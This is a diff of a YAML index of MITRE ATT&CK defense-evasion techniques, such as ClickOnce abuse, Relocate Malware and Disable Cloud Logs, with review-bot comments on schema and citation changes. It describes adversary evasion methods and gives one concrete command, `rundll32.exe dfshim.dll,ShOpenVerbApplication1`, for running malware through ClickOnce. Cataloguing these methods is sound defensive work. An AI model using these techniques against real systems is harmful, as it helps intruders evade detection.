description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10929,8 +11065,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests: []
T1553.004:
@@ -11025,48 +11159,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests: []
T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
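Review bot: Most of the `-` lines in this T1027.004 hunk (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `external_references`) are moves rather than deletions and reappear in sorted key order in the next two hunks; the substantive changes are the `modified` timestamp, the description now naming `ilasm.exe(Citation: ATTACK IQ)` alongside csc.exe and GCC/MinGW, the added contributor `Liran Ravich, CardinalOps` and the new `x_mitre_deprecated: false`. Emitting keys in a stable order from the generator would keep diffs like this reviewable; until then, listing the real content changes in the PR description would help.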
@@ -11075,9 +11185,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
@@ -11089,12 +11204,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests: []
T1564.007:
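Review bot: `x_mitre_permissions_required: - User` is removed outright here and, unlike the other keys taken out of this object, does not reappear in sorted position, so confirm the drop is intended and that nothing downstream filters on it. The new `ATTACK IQ` reference resolves the `(Citation: ATTACK IQ)` added to the description, and the re-emitted `ClearSky MuddyWater Nov 2018` and `TrendMicro WindowsAppMac` entries match the description's remaining citations, so no dangling citations result.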
@@ -11142,7 +11280,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11168,12 +11306,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11263,7 +11399,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1127.001:
@@ -11321,12 +11456,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests: []
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -11368,10 +11502,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -11395,18 +11528,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
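Review bot: The rewritten T1578.005 description drops the entire third paragraph (Global Administrator creating subscriptions and subscription hijacking) and with it the `(Citation: Microsoft Peach Sandstorm 2023)` and `(Citation: Microsoft Subscription Hijacking 2022)` citations; this is a content change, not just the switch from a `|-` block scalar to a double-quoted string, and it explains the version bump in the next hunk. The new string ends in `Cloud Regions](https://attack.mitre.org/techniques/T1535). "` with a trailing space inside the quotes, which is harmless but indicates the upstream text was taken as-is.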
@@ -11420,7 +11565,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -11432,20 +11577,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
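Review bot: two references are dropped here ("Microsoft Subscription Hijacking 2022" and "Microsoft Peach Sandstorm 2023") but the matching description is only partly visible in the hunk above; confirm the updated description no longer contains `(Citation: Microsoft Subscription Hijacking 2022)` or `(Citation: Microsoft Peach Sandstorm 2023)`. A citation token with no entry in `external_references` renders as literal text instead of a footnote. The remaining "Microsoft Cryptojacking 2023" and "Microsoft Azure Policy" entries are still cited in the description and should stay.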
@@ -11454,11 +11590,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
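Review bot: `spec_version: '2.1'` is removed from this object and from every other technique object in the patch. That is a schema change for any consumer that validated on the key, and STIX 2.1 requires `spec_version` on every SDO, so if this YAML is ever re-exported as STIX the field has to be re-added. Worth a line in the commit message saying the drop is deliberate and which generator change caused it.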
@@ -11467,6 +11602,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -11476,6 +11612,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
@@ -11487,13 +11624,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
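Review bot: replacing `Google Workspace`, `Azure AD` and `Office 365` with `Office Suite` and `Identity Provider` changes the values that platform-keyed outputs (per-platform index files, platform filters in the test generator) are built from; those outputs need regenerating in the same change, or T1562.008 will disappear from the old platform views without showing up in the new ones. The minor bump `2.0` to `2.1` is consistent with a platform-only change.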
@@ -11538,9 +11675,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests:
- name: AWS - CloudTrail Changes
@@ -11958,18 +12092,140 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests: []
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
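Review bot: the two Burke/CISA reference URLs carry Google Analytics tracking parameters (`?_gl=1*...&_ga=...`) that should be stripped before storing; they are not part of the resource identity and will rot. The same two entries name the author differently ("William J. Burke IV" vs "William Joseph Burke III"), and "Latrodectus: This Spider Bytes Like Ice ." has a stray space before the period; all three are upstream data, so fix in the sync rather than by hand. Both new techniques ship `x_mitre_detection: ''` and `atomic_tests: []` with no `identifier:` key, whereas T1564.003 just above has `identifier: T1564.003` beside an empty list; any code that keys on `identifier` must tolerate its absence.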
@@ -12002,10 +12258,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
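Review bot: this hunk drops `SaaS` as well as `Azure AD` from T1556.009's platforms, while only `Identity Provider` is added. If the intent was the `Azure AD` to `Identity Provider` rename, confirm the `SaaS` removal against upstream, since it narrows which platform views still list the technique.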
@@ -12042,40 +12297,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -12084,20 +12309,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
